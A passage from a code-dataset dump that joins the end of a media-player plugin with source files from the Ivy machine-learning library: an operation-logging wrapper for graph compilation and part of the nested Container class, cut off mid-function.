self.player.play(self.list_weishi[index]['link'])
def stop(self):
super().stop()
print("pugin stop")
def newPlugin(player:StellarPlayer.IStellarPlayer,*arg):
plugin = weishiplugin(player)
return plugin
def destroyPlugin(plugin:StellarPlayer.IStellarPlayerPlugin):
plugin.stop()
``` |
{
"source": "792370706/Ivy",
"score": 2
} |
#### File: ivy/compiler/op_logging.py
```python
import ivy
import weakref
import inspect
import importlib
# local
from ivy.compiler import globals as glob
# noinspection PyProtectedMember
from ivy.compiler.helpers import _get_unique_id, _get_shape, _get_fn_signature, _clone_param, _delete_dependent_param,\
_args_n_kwarg_reprs_from_keys_n_args_n_kwargs, _output_reprs_from_output
# noinspection PyProtectedMember
from ivy.wrapper import _wrap_or_unwrap_methods, NON_WRAPPED_METHODS, ARRAYLESS_RET_METHODS
def _wrap_method_for_op_logging(fn, graph, limit_attributes=True, stateful_classes=None):
stateful_classes = tuple(ivy.default(stateful_classes, tuple()))
if (inspect.isclass(fn) or (hasattr(fn, '__name__') and
((fn.__name__[0] == '_' and fn.__name__ not in glob.ARRAY_BUILTINS) or
fn.__name__ in NON_WRAPPED_METHODS + ARRAYLESS_RET_METHODS)) or
(hasattr(fn, 'wrapped_for_compiling') and fn.wrapped_for_compiling)):
return fn
# noinspection PyUnresolvedReferences,PyProtectedMember
def _method_wrapped(*args, **kwargs):
# if cloning a param currently, return directly via the original function
if glob.wrapping_paused:
return fn(*args, **kwargs)
if glob.wrapped_stack:
# return if the wrapping is already happening on a higher level, and it's not a built-in which legitimately
# might need to be nested, unless it's a built-in recursion loop (ie for __getattribute__) in which case return
if (glob.wrapped_stack[-1].__name__[0:2] != '__' or
(glob.wrapped_stack[-1].__name__ == fn.__name__ and args == args and kwargs == kwargs)):
return fn(*args, **kwargs)
# return if the current method is a (possibly reversed) built-in operator, and the last entry of the wrapped
# stack is a version of that same operator
elif fn.__name__.replace('r', '').replace('_', '') in\
glob.wrapped_stack[-1].__name__.replace('r', '').replace('_', ''):
return fn(*args, **kwargs)
# attributes to ignore
if fn.__name__ in ['__getattr__', '__setattr__', '__getattribute__']:
att_name = args[1]
# return if the attribute being retrieved is another built-in method
if att_name[0:2] == '__':
return fn(*args, **kwargs)
# if the attribute is not recognized as one which can form part of the graph, then return
if limit_attributes and att_name not in glob.GRAPH_ATTRIBUTES[ivy.current_framework_str()]:
return fn(*args, **kwargs)
# otherwise, set wrapping as true
glob.wrapped_stack.append(fn)
# immutable tuple to mutable list
args = list(ivy.nested_map(args, lambda a: a, to_mutable=True))
kwargs = ivy.nested_map(kwargs, lambda v: v, to_mutable=True)
# get array idxs for positional args
# ToDo: work out why adding check_nests=True causes errors.
# This is needed in order to support stateful updates of ivy.Containers.
# arg_tracked_idxs = ivy.nested_indices_where(
# args, lambda x: ivy.is_array(x) or isinstance(x, stateful_classes), check_nests=True)
arg_tracked_idxs = ivy.nested_indices_where(
args, lambda x_: ivy.is_array(x_) or isinstance(x_, stateful_classes))
arg_vals = list(ivy.multi_index_nest(args, arg_tracked_idxs))
arg_param_ids = [_get_unique_id(x) for x in arg_vals]
for x in arg_vals:
glob.raw_pids_to_weakrefs[id(x)] = weakref.ref(x)
arg_param_types = [x.__class__ for x in arg_vals]
arg_param_var_flags = [ivy.is_variable(x, exclusive=True) for x in arg_vals]
arg_param_shapes = [_get_shape(x) for x in arg_vals]
# get array idxs for key-word args
# ToDo: work out why adding check_nests=True causes errors.
# This is needed in order to support stateful updates of ivy.Containers.
# kwarg_tracked_idxs = ivy.nested_indices_where(
# kwargs, lambda x: ivy.is_array(x) or isinstance(x, stateful_classes), check_nests=True)
kwarg_tracked_idxs = ivy.nested_indices_where(
kwargs, lambda x_: ivy.is_array(x_) or isinstance(x_, stateful_classes))
kwarg_vals = list(ivy.multi_index_nest(kwargs, kwarg_tracked_idxs))
kwarg_param_ids = [_get_unique_id(x) for x in kwarg_vals]
for x in kwarg_vals:
glob.raw_pids_to_weakrefs[id(x)] = weakref.ref(x)
kwarg_param_types = [x.__class__ for x in kwarg_vals]
kwarg_param_var_flags = [ivy.is_variable(x, exclusive=True) for x in kwarg_vals]
kwarg_param_shapes = [_get_shape(x) for x in kwarg_vals]
# set the backend function
backend_fn = fn
# compute the return
ret_raw = fn(*args, **kwargs)
# provide return value for __setattr__
if fn.__name__ == '__setattr__':
ret_raw = args[0]
# update the setattr method to return the object after attribute setting
def backend_fn(__obj, __name, __value):
setattr(__obj, __name, __value)
return __obj
# remove parameters from args and kwargs
ivy.map_nest_at_indices(args, arg_tracked_idxs, lambda x_: _delete_dependent_param(x_, graph))
ivy.map_nest_at_indices(kwargs, kwarg_tracked_idxs, lambda x_: _delete_dependent_param(x_, graph))
# covert return to list
ret_listified = False
if isinstance(ret_raw, tuple):
ret = list(ret_raw)
else:
ret = [ret_raw]
ret_listified = True
# get array idxs for return
# ToDo: work out why adding check_nests=True causes errors.
# This is needed in order to support stateful updates of ivy.Containers.
# output_tracked_idxs = ivy.nested_indices_where(
# ret, lambda x: ivy.is_array(x) or isinstance(x, stateful_classes), check_nests=True)
output_tracked_idxs = ivy.nested_indices_where(
ret, lambda x_: ivy.is_array(x_) or isinstance(x_, stateful_classes))
output_vals = list(ivy.multi_index_nest(ret, output_tracked_idxs))
output_param_ids = [_get_unique_id(x) for x in output_vals]
output_param_types = [x.__class__ for x in output_vals]
output_param_var_flags = [ivy.is_variable(x, exclusive=True) for x in output_vals]
output_param_shapes = [_get_shape(x) for x in output_vals]
# clone the param when getting an attribute, to preserve uniqueness in the graph
if fn.__name__ in ['__getattr__', '__getattribute__']:
            # update the param_id for each param in the retrieved attribute in the graph
ivy.map_nest_at_indices(ret, output_tracked_idxs, lambda x: _clone_param(x, graph))
# find all duplicate param ids from the input in the return
duplicates = list()
for i, ret_pid in enumerate(output_param_ids):
if ret_pid in arg_param_ids + kwarg_param_ids:
duplicates.append(i)
# clone all repeated return parameters to give unique parameter ids in the graph
duplicate_tracked_idxs = [output_tracked_idxs[i] for i in duplicates]
ivy.map_nest_at_indices(ret, duplicate_tracked_idxs, lambda x: _clone_param(x, graph))
# get return param ids after cloning
output_vals = list(ivy.multi_index_nest(ret, output_tracked_idxs))
output_param_ids = [_get_unique_id(x) for x in output_vals]
for x in output_vals:
glob.raw_pids_to_weakrefs[id(x)] = weakref.ref(x)
# maybe add to set of dependent_pids
if fn.__name__ in glob.GENERATOR_METHODS and graph.include_generators:
[glob.dependent_pids.add(pid) for pid in output_param_ids]
else:
for pid in arg_param_ids + kwarg_param_ids:
if pid in glob.dependent_pids:
[glob.dependent_pids.add(pid) for pid in output_param_ids]
break
# wrap the function
def new_fn(arg_array_vals, kwarg_array_vals):
# ToDo: make this as efficient as possible; this is performed at runtime
args_writeable = ivy.copy_nest(args)
kwargs_writeable = ivy.copy_nest(kwargs)
ivy.set_nest_at_indices(args_writeable, arg_tracked_idxs, arg_array_vals)
ivy.set_nest_at_indices(kwargs_writeable, kwarg_tracked_idxs, kwarg_array_vals)
return backend_fn(*args_writeable, **kwargs_writeable)
# add function attributes which inform about the arguments and returns
glob.wrapping_paused = True
new_fn.arg_reprs = str(args)
new_fn.arg_tracked_idxs = arg_tracked_idxs
new_fn.arg_param_ids = arg_param_ids
new_fn.arg_param_types = arg_param_types
new_fn.arg_param_var_flags = arg_param_var_flags
new_fn.arg_param_shapes = arg_param_shapes
new_fn.kwarg_reprs = str(kwargs)
new_fn.kwarg_tracked_idxs = kwarg_tracked_idxs
new_fn.kwarg_param_ids = kwarg_param_ids
new_fn.kwarg_param_types = kwarg_param_types
new_fn.kwarg_param_var_flags = kwarg_param_var_flags
new_fn.kwarg_param_shapes = kwarg_param_shapes
try:
sig = inspect.signature(fn)
sig_keys = list(sig.parameters.keys())
except ValueError:
sig_keys = list()
new_fn.arg_n_kwarg_reprs = _args_n_kwarg_reprs_from_keys_n_args_n_kwargs(sig_keys, args, kwargs)
new_fn.output_tracked_idxs = output_tracked_idxs
new_fn.output_param_ids = output_param_ids
new_fn.output_param_types = output_param_types
new_fn.output_param_var_flags = output_param_var_flags
new_fn.output_param_shapes = output_param_shapes
new_fn.output_reprs = _output_reprs_from_output(ret)
new_fn.signature = _get_fn_signature(backend_fn)
new_fn.terminal = True
new_fn.is_constant = len(arg_param_ids + kwarg_param_ids) == 0 and \
(not graph.include_generators or
fn.__name__ not in glob.GENERATOR_METHODS[ivy.current_framework_str()])
glob.wrapping_paused = False
fns_in = [graph._pid_to_functions_dict[pid]
for pid in arg_param_ids + kwarg_param_ids if pid in graph._pid_to_functions_dict]
for fn_in in fns_in:
fn_in.terminal = False
if new_fn not in fn_in.fns_out:
fn_in.fns_out.append(new_fn)
new_fn.fns_in = fns_in
new_fn.fns_out = list()
new_fn.__repr__ = lambda: new_fn.__name__
if hasattr(fn, '__name__'):
new_fn.__name__ = fn.__name__
# add to graph if compiling
if glob.op_logging:
# add this function to the graph for each output pid
for pid in output_param_ids:
if pid in graph._pid_to_functions_dict:
graph._register_output(ret)
glob.op_logging = False
_unwrap_methods_from_op_logging(list(graph._stateful_classes))
# noinspection PyBroadException
try:
graph.show(save_to_disk=True, output_connected_only=False)
except Exception:
pass
raise Exception(
'\n\ntried to add {} to graph._functions_dict, but function {} with the same output pid {} '
'already exists!'.format(
new_fn.__name__ + '(*{}, **{})'.format(new_fn.arg_reprs, new_fn.kwarg_reprs),
graph._pid_to_functions_dict[pid].__name__ + '(*{}, **{})'.format(
graph._pid_to_functions_dict[pid].arg_reprs,
graph._pid_to_functions_dict[pid].kwarg_reprs), pid))
graph.add_fn_to_dict(pid, new_fn)
# unset wrapping as true
glob.wrapped_stack.pop(-1)
# return the function output
return ret[0] if ret_listified else tuple(ret)
if hasattr(fn, '__name__'):
_method_wrapped.__name__ = fn.__name__
_method_wrapped.wrapped_for_compiling = True
_method_wrapped.inner_fn = fn
return _method_wrapped
def _unwrap_method_from_op_logging(method_wrapped):
if not hasattr(method_wrapped, 'wrapped_for_compiling') or not method_wrapped.wrapped_for_compiling:
return method_wrapped
return method_wrapped.inner_fn
def _wrap_methods_for_op_logging(graph, stateful_classes=None):
# wrap backend framework
classes_to_wrap = [getattr(importlib.import_module(ctw[0]), ctw[1])
for ctw in glob.CLASSES_TO_WRAP[ivy.current_framework_str()]]
_wrap_or_unwrap_methods(
lambda fn: _wrap_method_for_op_logging(fn, graph), classes_to_wrap=classes_to_wrap, native=True)
# wrap stateful classes
stateful_classes = ivy.default(stateful_classes, [])
for cls in stateful_classes:
assert hasattr(cls, '__setattr__') and (hasattr(cls, '__getattr__') or hasattr(cls, '__getattribute__'))
cls.__setattr__ = _wrap_method_for_op_logging(
cls.__setattr__, graph, limit_attributes=False, stateful_classes=stateful_classes)
if hasattr(cls, '__getattr__'):
cls.__getattr__ = _wrap_method_for_op_logging(
cls.__getattr__, graph, limit_attributes=False, stateful_classes=stateful_classes)
if hasattr(cls, '__getattribute__'):
cls.__getattribute__ = _wrap_method_for_op_logging(
cls.__getattribute__, graph, limit_attributes=False, stateful_classes=stateful_classes)
def _unwrap_methods_from_op_logging(stateful_classes=None):
# unwrap backend framework
classes_to_wrap = [getattr(importlib.import_module(ctw[0]), ctw[1])
for ctw in glob.CLASSES_TO_WRAP[ivy.current_framework_str()]] + stateful_classes
_wrap_or_unwrap_methods(
lambda fn: _unwrap_method_from_op_logging(fn), classes_to_wrap=classes_to_wrap, native=True)
# unwrap stateful classes
stateful_classes = ivy.default(stateful_classes, [])
for cls in stateful_classes:
assert hasattr(cls, '__setattr__') and (hasattr(cls, '__getattr__') or hasattr(cls, '__getattribute__'))
cls.__setattr__ = _unwrap_method_from_op_logging(cls.__setattr__)
if hasattr(cls, '__getattr__'):
cls.__getattr__ = _unwrap_method_from_op_logging(cls.__getattr__)
if hasattr(cls, '__getattribute__'):
cls.__getattribute__ = _unwrap_method_from_op_logging(cls.__getattribute__)
```
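The wrapper above intercepts backend calls, records the tracked parameter ids of their inputs and outputs, and registers each call in the graph keyed by its output ids. Below is a deliberately stripped-down, self-contained sketch of that general idea, not Ivy's API; every name in it is illustrative:
```python
import functools

call_log = []  # (function name, input object ids, output object id)

def log_op(fn):
    """Wrap fn so every call appends an entry to call_log."""
    @functools.wraps(fn)
    def wrapped(*args, **kwargs):
        ret = fn(*args, **kwargs)
        in_ids = [id(a) for a in args] + [id(v) for v in kwargs.values()]
        call_log.append((fn.__name__, in_ids, id(ret)))
        return ret
    return wrapped

@log_op
def add(x, y):
    return x + y

add(1, 2)
# call_log now holds one ('add', [...], ...) entry; a later pass could stitch
# such entries into a call graph by matching output ids against input ids.
```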
#### File: ivy/core/container.py
```python
import re
import termcolor
import numpy as _np
import json as _json
import h5py as _h5py
import pickle as _pickle
import random as _random
from operator import lt as _lt
from operator import le as _le
from operator import eq as _eq
from operator import ne as _ne
from operator import gt as _gt
from operator import ge as _ge
from operator import mul as _mul
from operator import pow as _pow
from operator import not_ as _not
from functools import reduce as _reduce
from typing import Union, Iterable, Dict
from operator import truediv as _truediv
from operator import floordiv as _floordiv
# local
import ivy as _ivy
def _is_jsonable(x):
try:
_json.dumps(x)
return True
except (TypeError, OverflowError):
return False
def _repr(x):
try:
return x.__repr__()
except TypeError:
return str(x)
# noinspection PyMissingConstructor
class Container(dict):
def __init__(self, dict_in=None, queues=None, queue_load_sizes=None, container_combine_method='list_join',
queue_timeout=None, print_limit=10, print_indent=4, print_line_spacing=0, ivyh=None,
keyword_color_dict=None, rebuild_child_containers=False, types_to_iteratively_nest=None, **kwargs):
"""
Initialize container object from input dict representation.
:param dict_in: the dictionary the container should wrap around. Default is None.
:type dict_in: dict, optional
:param queues: Sequence of multiprocessing queues, each of which returns containers.
This enables the current container to be passed around asynchronously while waiting for data.
Default is None.
:type queues: sequence of multiprocessing queues, optional
:param queue_load_sizes: Size of leading dimension of the containers returned by each queue. Default is None.
:type queue_load_sizes: sequence of ints, optional
:param container_combine_method: The method to use for combining containers arriving from different queues.
Default is ivy.Container.list_join
:type container_combine_method: str, optional
:param queue_timeout: The timeout when waiting for containers to arrive from the queues. Default is global.
:type queue_timeout: float, optional
:param print_limit: The total array size limit when printing the container. Default is 10.
:type print_limit: int, optional
:param print_indent: The number of whitespaces to use for indenting when printing the container. Default is 4.
:type print_indent: int, optional
:param print_line_spacing: The number of extra newlines to use between keys when printing the container.
Default is 0.
:type print_line_spacing: int, optional
:param ivyh: Handle to ivy module to use for the calculations. Default is None, which results in the global ivy.
:type ivyh: handle to ivy module, optional
:param keyword_color_dict: A dict mapping keywords to their termcolor color codes for printing the container.
:type keyword_color_dict: dict, optional
        :param rebuild_child_containers: Whether to rebuild containers found in dict_in with these constructor params.
                                         Default is False, in which case the original containers are kept as they are.
:type rebuild_child_containers: bool, optional
:param types_to_iteratively_nest: The data types to nest iteratively in the dict structure, each type must be
iterable. Default is None.
:type types_to_iteratively_nest: seq of iterable types
:param kwargs: keyword arguments for dict creation. Default is None.
:type kwargs: keyword arguments.
"""
self._queues = queues
self._print_limit = print_limit
self._print_indent = print_indent
self._print_line_spacing = print_line_spacing
self._container_combine_method = container_combine_method
self._types_to_iteratively_nest = _ivy.default(lambda: tuple(types_to_iteratively_nest), (), True)
if _ivy.exists(self._queues):
if isinstance(self._container_combine_method, str):
self._container_combine_method =\
{'list_join': self.list_join,
'concat': lambda conts: self.concat(conts, 0)}[self._container_combine_method]
self._loaded_containers_from_queues = dict()
self._queue_load_sizes_cum = _np.cumsum(queue_load_sizes)
self._queue_timeout = _ivy.default(queue_timeout, _ivy.queue_timeout())
self._local_ivy = ivyh
self._keyword_color_dict = _ivy.default(keyword_color_dict, {})
self._rebuild_child_containers = rebuild_child_containers
self._config = dict(
print_limit=print_limit, print_indent=print_indent, print_line_spacing=print_line_spacing, ivyh=ivyh,
keyword_color_dict=keyword_color_dict, rebuild_child_containers=rebuild_child_containers,
types_to_iteratively_nest=types_to_iteratively_nest)
if dict_in is None:
if kwargs:
dict_in = dict(**kwargs)
else:
dict_in = dict()
elif kwargs:
raise Exception('dict_in and **kwargs cannot both be specified for ivy.Container constructor,'
'please specify one or the other, not both.')
if isinstance(dict_in, dict):
dict_in = dict_in
elif isinstance(dict_in, tuple(self._types_to_iteratively_nest)):
dict_in = dict(zip(['it_{}'.format(str(i).zfill(len(str(len(dict_in)))))
for i in range(len(dict_in))], dict_in))
else:
raise Exception('invalid input {}'.format(dict_in))
for key, value in sorted(dict_in.items()):
d = isinstance(value, tuple(self._types_to_iteratively_nest))
if (isinstance(value, dict) and (not isinstance(value, Container) or rebuild_child_containers)) or \
isinstance(value, tuple(self._types_to_iteratively_nest)):
self[key] = Container(value, **self._config)
else:
self[key] = value
# Class Methods #
# --------------#
@staticmethod
def list_join(containers, config=None):
"""
Join containers of lists together along the specified dimension.
:param containers: containers to list join
:type containers: sequence of Container objects
:param config: The configuration for the containers. Default is the same as container0.
:type config: dict, optional
:return: List joined containers, with each entry being a list of arrays
"""
container0 = containers[0]
if not _ivy.exists(config):
config = container0.config if isinstance(container0, Container) else {}
if isinstance(container0, Container):
return_dict = dict()
for key in container0.keys():
new_list = list()
for container in containers:
new_list.append(container[key])
return_dict[key] = Container.list_join(new_list, config)
return Container(return_dict, **config)
else:
return [item for sublist in containers for item in sublist]
@staticmethod
def list_stack(containers, dim, config=None):
"""
List stack containers together along the specified dimension.
:param containers: containers to list stack
:type containers: sequence of Container objects
:param dim: dimension along which to list stack
:type dim: int
:param config: The configuration for the containers. Default is the same as container0.
:type config: dict, optional
:return: Stacked containers, with each entry being a list of arrays
"""
container0 = containers[0]
if not _ivy.exists(config):
config = container0.config if isinstance(container0, Container) else {}
if isinstance(container0, Container):
return_dict = dict()
for key in container0.keys():
return_dict[key] = Container.list_stack([container[key] for container in containers], dim, config)
return Container(return_dict, **config)
else:
return containers
@staticmethod
def _concat_unify(containers, dev_str, axis=0):
return Container.concat([cont.to_dev(dev_str) for cont in containers.values()], axis)
@staticmethod
def _sum_unify(containers, dev_str, _=None, _1=None):
return sum([cont.to_dev(dev_str) for cont in containers.values()])
@staticmethod
def _mean_unify(containers, dev_str, _=None, _1=None):
return Container._sum_unify(containers, dev_str) / len(containers)
@staticmethod
def unify(containers, dev_str, mode, axis=0):
"""
Unify a list of containers, on arbitrary devices, to a single container on the specified device.
:param containers: containers to unify
:type containers: sequence of Container objects
:param dev_str: The device to unify the containers to.
:type dev_str: str
:param mode: The mode by which to unify, must be one of [ concat | mean | sum ]
:type mode: str
        :param axis: The axis along which to concatenate the containers, if concat mode is set. Default is 0.
:type axis: int, optional
:return: Unified container
"""
return {'concat': Container._concat_unify,
'sum': Container._sum_unify,
'mean': Container._mean_unify}[mode](containers, dev_str, axis)
@staticmethod
def concat(containers, dim, config=None):
"""
Concatenate containers together along the specified dimension.
:param containers: containers to concatenate
:type containers: sequence of Container objects
:param dim: dimension along which to concatenate
:type dim: int
:param config: The configuration for the containers. Default is the same as container0.
:type config: dict, optional
:return: Concatenated containers
"""
container0 = containers[0]
if not _ivy.exists(config):
config = container0.config if isinstance(container0, Container) else {}
if isinstance(container0, Container):
return_dict = dict()
for key in container0.keys():
return_dict[key] = Container.concat([container[key] for container in containers], dim, config)
return Container(return_dict, **config)
else:
# noinspection PyProtectedMember
ivyh = _ivy.default(config['ivyh'], _ivy)
# noinspection PyBroadException
try:
if len(containers[0].shape) == 0:
return ivyh.concatenate([ivyh.reshape(item, [1] * (dim + 1)) for item in containers], dim)
else:
return ivyh.concatenate(containers, dim)
except Exception as e:
raise Exception(str(e) + '\nContainer concat operation only valid for containers of arrays')
@staticmethod
def stack(containers, dim, config=None):
"""
Stack containers together along the specified dimension.
:param containers: containers to stack
:type containers: sequence of Container objects
:param dim: dimension along which to stack
:type dim: int
:param config: The configuration for the containers. Default is the same as container0.
:type config: dict, optional
:return: Stacked containers
"""
container0 = containers[0]
if not _ivy.exists(config):
config = container0.config if isinstance(container0, Container) else {}
if isinstance(container0, Container):
return_dict = dict()
for key in container0.keys():
return_dict[key] = Container.stack([container[key] for container in containers], dim, config)
return Container(return_dict, **config)
else:
# noinspection PyProtectedMember
ivyh = _ivy.default(config['ivyh'], _ivy)
# noinspection PyBroadException
try:
if len(containers[0].shape) == 0:
return ivyh.stack([ivyh.reshape(item, [1] * (dim + 1)) for item in containers], dim, config)
else:
return ivyh.stack(containers, dim)
except Exception as e:
raise Exception(str(e) + '\nContainer stack operation only valid for containers of arrays')
@staticmethod
def combine(*containers, config=None):
"""
Combine keys and values in a sequence of containers, with priority given to the right-most container in the case
of duplicates.
:param containers: containers to compare
:type containers: sequence of Container objects
:param config: The configuration for the containers. Default is the same as container_rightmost.
:type config: dict, optional
:return: Combined containers
"""
# if inputs are not dicts, then simply return the right-most value
container_rightmost = containers[-1]
if not isinstance(container_rightmost, dict):
return container_rightmost
if not _ivy.exists(config):
config = container_rightmost.config if isinstance(container_rightmost, Container) else {}
# return if len==1
if len(containers) == 1:
return container_rightmost
# otherwise, check that the keys are aligned between each container, and apply this method recursively
return_dict = dict()
all_Keys = set([item for sublist in [list(cont.keys()) for cont in containers] for item in sublist])
for key in all_Keys:
keys_present = [key in cont for cont in containers]
return_dict[key] =\
_ivy.Container.combine(*[cont[key] for cont, kp in zip(containers, keys_present) if kp], config=config)
return _ivy.Container(return_dict, **config)
@staticmethod
def diff(*containers, mode='all', diff_keys='diff', detect_key_diffs=True, config=None):
"""
Compare keys and values in a sequence of containers, returning the single shared values where they are the same,
and new nested sub-dicts with all values where they are different.
:param containers: containers to compare
:type containers: sequence of Container objects
:param mode: The mode of the diff operation, returning either all keys and values,
                     only those that are consistent across the containers, or only the differences. Default is all.
:type mode: str, optional
:param diff_keys: The key/keys to add to the returned container when differences are found. Default is "diff".
:type diff_keys: str or list of strs, optional
:param detect_key_diffs: Whether to treat different keys as detected differences.
If not, the keys among the input containers are simply combined without flagging
differences. Default is True.
:type detect_key_diffs: bool, optional
:param config: The configuration for the containers. Default is the same as container0.
:type config: dict, optional
:return: Compared containers
"""
if mode not in ['all', 'same_only', 'diff_only']:
raise Exception('mode must be one of [ "all" | "same_only" | "diff_only" ], but found {}'.format(mode))
# if inputs are not dicts, then compare their values to determine the diff dict
num_containers = len(containers)
container0 = containers[0]
if not _ivy.exists(config):
config = container0.config if isinstance(container0, Container) else {}
if not isinstance(container0, dict):
equal_mat = _ivy.equal(*containers, equality_matrix=True)
if _ivy.reduce_min(_ivy.cast(equal_mat, 'int32')) == 1:
if mode == 'diff_only':
return _ivy.Container(**config)
return container0
elif mode == 'same_only':
return _ivy.Container(**config)
else:
cont_range = range(num_containers)
diff_dict = dict()
cont_dict = dict(zip(cont_range, containers))
idxs_added = list()
for idx in cont_range:
if idx not in idxs_added:
idxs_to_add = _ivy.indices_where(equal_mat[idx])
idxs_to_add_list = sorted(_ivy.to_numpy(idxs_to_add).reshape(-1).tolist())
if isinstance(diff_keys, str):
key = diff_keys + '_' + str(idxs_to_add_list)[1:-1]
elif isinstance(diff_keys, (list, tuple)):
key = diff_keys[idx]
else:
raise Exception('diff_keys must be either a string or list of strings,'
'but found {} of type {}'.format(diff_keys, type(diff_keys)))
diff_dict[key] = cont_dict[idx]
idxs_added += idxs_to_add_list
return _ivy.Container(diff_dict, **config)
# otherwise, check that the keys are aligned between each container, and apply this method recursively
return_dict = dict()
all_Keys = set([item for sublist in [list(cont.keys()) for cont in containers] for item in sublist])
for key in all_Keys:
keys_present = [key in cont for cont in containers]
all_Keys_present = sum(keys_present) == num_containers
if all_Keys_present:
res = _ivy.Container.diff(*[cont[key] for cont in containers],
mode=mode, diff_keys=diff_keys, detect_key_diffs=detect_key_diffs,
config=config)
if not isinstance(res, dict) or res:
return_dict[key] = res
continue
elif sum(keys_present) == 1 and not detect_key_diffs:
return_dict[key] = containers[keys_present.index(True)][key]
continue
diff_dict = dict()
for i, (key_present, cont) in enumerate(zip(keys_present, containers)):
if detect_key_diffs:
if key_present and mode != 'same_only':
if isinstance(diff_keys, str):
diff_dict[diff_keys + '_' + str(i)] = cont[key]
elif isinstance(diff_keys, (list, tuple)):
diff_dict[diff_keys[i]] = cont[key]
else:
raise Exception('diff_keys must be either a string or list of strings,'
'but found {} of type {}'.format(diff_keys, type(diff_keys)))
if diff_dict:
return_dict[key] = diff_dict
return _ivy.Container(return_dict, **config)
@staticmethod
def multi_map(func, containers, key_chains=None, to_apply=True, prune_unapplied=False, key_chain='', config=None):
"""
Apply function to all array values from a collection of identically structured containers.
:param func: Function to apply to each container entry.
:type func: python function
:param containers: containers to map.
:type containers: sequence of Container objects
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param prune_unapplied: Whether to prune key_chains for which the function was not applied,
otherwise the leftmost container value is used. Default is False.
:type prune_unapplied: bool, optional
:param key_chain: Chain of keys for this dict entry
:type key_chain: str
:param config: The configuration for the containers. Default is the same as container0.
:type config: dict, optional
        :return: Container
"""
container0 = containers[0]
if not _ivy.exists(config):
config = container0.config if isinstance(container0, Container) else {}
return_dict = dict()
for key in sorted(container0.keys()):
values = [cont[key] for cont in containers]
value0 = values[0]
this_key_chain = key if key_chain == '' else (key_chain + '/' + key)
if isinstance(value0, Container):
ret = _ivy.Container.multi_map(
func, values, key_chains, to_apply, prune_unapplied, this_key_chain, config)
if ret:
return_dict[key] = ret
else:
if key_chains is not None:
if (this_key_chain in key_chains and not to_apply) or (
this_key_chain not in key_chains and to_apply):
if prune_unapplied:
continue
return_dict[key] = value0
continue
return_dict[key] = func(values, this_key_chain)
# noinspection PyProtectedMember
return Container(return_dict, **config)
@staticmethod
def identical_structure(containers, check_types=True, key_chains=None, to_apply=True, key_chain=''):
"""
Returns a single boolean as to whether the input containers have identical key-chains and data types.
:param containers: containers to map.
:type containers: sequence of Container objects
:param check_types: Whether to also check whether the datatypes of the leaf nodes are the same. Default is True.
:type check_types: bool, optional
:param key_chains: The key-chains to apply or not apply the method to. Default is None.
:type key_chains: list or dict of strs, optional
:param to_apply: If True, the method will be applied to key_chains, otherwise key_chains will be skipped.
Default is True.
:type to_apply: bool, optional
:param key_chain: Chain of keys for this dict entry
:type key_chain: str
:return: Boolean
"""
keys = set([i for sl in [list(cont.keys()) for cont in containers] for i in sl])
for key in sorted(keys):
if not min([key in cont for cont in containers]):
return False
values = [cont[key] for cont in containers]
value_0 = values[0]
type_0 = type(value_0)
types = [type(val) for val in values]
if not min([type_n is type_0 for type_n in types]):
if isinstance(value_0, Container) or check_types:
return False
this_key_chain = key if key_chain == '' else (key_chain + '/' + key)
if isinstance(value_0, Container):
                ret = _ivy.Container.identical_structure(values, check_types, key_chains, to_apply, this_key_chain)
if not ret:
return False
return True
@staticmethod
def from_disk_as_hdf5(h5_obj_or_filepath, slice_obj=slice(None), ivyh=None):
"""
Load container object from disk, as an h5py file, at the specified hdf5 filepath.
:param h5_obj_or_filepath: Filepath where the container object is saved to disk, or h5 object.
:type h5_obj_or_filepath: str or h5 obj
:param slice_obj: slice object to slice all h5 elements.
:type slice_obj: slice or sequence of slices
:param ivyh: Handle to ivy module to use for the calculations. Default is None, which results in the global ivy.
:type ivyh: handle to ivy module, optional
:return: Container loaded from disk
"""
container_dict = dict()
if type(h5_obj_or_filepath) is str:
h5_obj = _h5py.File(h5_obj_or_filepath, 'r')
else:
h5_obj = h5_obj_or_filepath
for key, value in sorted(h5_obj.items()):
if isinstance(value, _h5py.Group):
container_dict[key] = Container.from_disk_as_hdf5(value, slice_obj, ivyh)
elif isinstance(value, _h5py.Dataset):
container_dict[key] = _ivy.default(ivyh, _ivy).array(list(value[slice_obj]))
else:
raise Exception('Item found inside h5_obj which was neither a Group nor a Dataset.')
return Container(container_dict, ivyh=ivyh)
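# Minimal usage sketch for hdf5 loading ('cont.hdf5' is a hypothetical path; requires h5py):
#
#   cont = Container({'x': ivy.array([[1., 2.], [3., 4.]])})
#   cont.to_disk_as_hdf5('cont.hdf5')
#   full = Container.from_disk_as_hdf5('cont.hdf5')                # whole container
#   first = Container.from_disk_as_hdf5('cont.hdf5', slice(0, 1))  # only the first batch element of each dataset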
@staticmethod
def from_disk_as_pickled(pickle_filepath, ivyh=None):
"""
Load container object from disk at the specified pickle filepath.
:param pickle_filepath: Filepath where the container object is saved to disk.
:type pickle_filepath: str
:param ivyh: Handle to ivy module to use for the calculations. Default is None, which results in the global ivy.
:type ivyh: handle to ivy module, optional
:return: Container loaded from disk
"""
if _ivy.wrapped_mode():
return Container(_pickle.load(open(pickle_filepath, 'rb')), ivyh=ivyh).to_ivy()
return Container(_pickle.load(open(pickle_filepath, 'rb')), ivyh=ivyh)
@staticmethod
def from_disk_as_json(json_filepath, ivyh=None):
"""
Load container object from disk at the specified json filepath.
If some objects were not json-able during saving, then they will be loaded as strings.
:param json_filepath: Filepath where the container object is saved to disk.
:type json_filepath: str
:param ivyh: Handle to ivy module to use for the calculations. Default is None, which results in the global ivy.
:type ivyh: handle to ivy module, optional
:return: Container loaded from disk
"""
with open(json_filepath) as json_data_file:
return Container(_json.load(json_data_file), ivyh=ivyh)
@staticmethod
def h5_file_size(h5_obj_or_filepath):
"""
Get file size of h5 file contents.
:param h5_obj_or_filepath: Filepath where the container object is saved to disk, or h5 object.
:type h5_obj_or_filepath: str or h5 obj
:return: Size of h5 file contents, and batch size.
"""
if type(h5_obj_or_filepath) is str:
h5_obj = _h5py.File(h5_obj_or_filepath, 'r')
else:
h5_obj = h5_obj_or_filepath
size = 0
batch_size = 0
for key, value in sorted(h5_obj.items()):
if isinstance(value, _h5py.Group):
size_to_add, batch_size = Container.h5_file_size(value)
size += size_to_add
elif isinstance(value, _h5py.Dataset):
value_shape = value.shape
size += _reduce(_mul, value_shape, 1) * value.dtype.itemsize
